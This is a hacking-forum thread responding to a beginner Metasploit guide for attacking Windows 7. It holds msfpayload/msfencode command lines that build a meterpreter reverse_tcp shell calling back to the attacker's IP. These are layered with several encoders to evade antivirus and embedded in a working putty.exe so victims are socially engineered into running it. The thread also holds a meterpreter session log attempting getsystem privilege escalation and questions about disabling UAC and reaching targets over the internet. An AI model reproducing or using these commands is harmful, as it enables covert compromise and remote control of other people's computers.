[HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

[pentest09]

So u like to use the truecrypt.exe nice lol one of a few that work nice.

For a great tutorial series on metasploit complete google metasploit megaprimer securitytube, best ive seen.

[Clonmac]

Wouldn't hurt to include a link to Metasploit Unleashed at the bottom of the guide to point beginners to the right place to take their followup learning to.

Metasploit Unleashed - Mastering the Framework

[xibit1987]

hi,im sorry for my amature question.im new one to metasploit

i dont get it this section

Code:

./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - How many time it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe

what EXE i need it ?

You need to find a exe file like putty or tcpview to encode the backdoor into.

[iproute]

About backdooring an exe: I already have that in the "Create the exploit". The first code box in the guide. i use encode here and i also explain i LITTLE bit about the error you can get I didn't go directly into details, but if thats what you guys want i can do that too By the way, have any of you got the "-k" option to work yet, so that the exe your backdooring still work? If yes, pleas post an example code

And again, I'm a beginner so please correct me if have understood anything wrong or I explained anything in the wrong way!

I thank you all for the kind words

Actually the -k option is what I am specifically referring to with my backdooring comment. As this is a client side attack, tricking/social engineering the user is everything so keeping your the backdoored exe working can be key sometimes. Not all executables work as templates with the -k option or possibly even as templates in the first place.

Also bear in mind that this example code here did not pass my current avast. I am moving this week and don't have time to re-work the encoding so it does. It did formerly, however the executable made with this multi-encoding command string has been uploaded to virustotal for testing, as really the command was simple for testing the workings of running multiple encoders. I also developed this particular string some time ago.

The code in this case is simply an example that yes multiple encoders can still be used when backdooring an exe and even still keeping template exe working.

Code:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.25.26
 LPORT=1417 R | msfencode -e x86/shikata_ga_nai -c 3 -t raw | msfencode -e
 x86/call4_dword_xor -c 4 -t raw | msfencode -e x86/fnstenv_mov -c 5 -t raw |
 msfencode -e x86/countdown -c 4 -t raw | msfencode -e x86/shikata_ga_nai -c 16
 -t exe -x /root/putty.exe -k -o /root/putty-backdoored.exe

Again, when running it with this post Avast did detect the exe and disposed of it. With avast off I am able to get a meterpreter session started. Of course modify ip address and port as needed.

[captainjackrana]

i know this question lies totally out of the topic.. but do the classic metasploit payloads and exploits work for win7 target platforms?

[Archangel-Amael]

i know this question lies totally out of the topic.. but do the classic metasploit payloads and exploits work for win7 target platforms?

What is a classic payload and or exploit? If you mean something designed for winxp, then no they most likely do not.
It would be a good idea for you to read up on the msfu

[comaX]

Hi, very useful tutorial ! I used to use SET for simplicity, but this is just great, and not that hard

I have some questions though :
- everything is running smooth when on the same network, but how can I use it via internet ? I have two networks, two PCs. When I try this, but using my public IP, it just fails and metasploit binds to 0.0.0.0... I tried allowing connections from outside through specific ports in my router, but same result...

Any idea people ?

Edit : never mind my post, it's running all smooth ! And I didn't know 0.0.0.0 meant all interfaces. As for not working forwarding port, it was just some router FW i got rid of, and it was the good way to do it !

[spudgunman]

I didnt think getsystem works on x64 for windows 7? I also have just a lot of BSOD in my testing with getting system privs... I dont understand how you did that?

I dont see this even working on a x32

Code:

meterpreter > sysinfo
Computer: WIN-MSUB6TKFKFA
OS      : Windows 7 (Build 7600, ).
Arch    : x86
Language: en_US
meterpreter > ps
...
608   explorer.exe         x86   1        WIN-MSUB6TKFKFA\user  C:\Windows\Explorer.EXE
meterpreter > migrate 608[*] Migrating to 608...[*] Migration completed successfully.
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeShutdownPrivilege
  SeChangeNotifyPrivilege
  SeUndockPrivilege
meterpreter > getsystem -t 1
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > getsystem -t 2
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > getsystem -t 3
[-] priv_elevate_getsystem: Operation failed: Access is denied.
meterpreter > getsystem -t 4
^C[-] Error running command getsystem: Interrupt

update: this is UAC blocking access, with UAC disabled this is no longer an issue I am still stuck on how to disable UAC..?

[rent2]

Very good tut and thanks for sharing this nice work.

[TheAppleMan]

Hi everyone. I'm italian so my english isn't correct xD
So... i've a problem with meterpreter: when i create it it's ok.
in lhost i set my external address and in the msfconsole my internal address but when in an other computer (it isn't in my lan) open the file nothing appends, msfconsole receives nothing. Why?
I do all correctly but... i don't know.
Anyone can help me?
Thanks

Again: Sorry for my bad english

TheAppleMan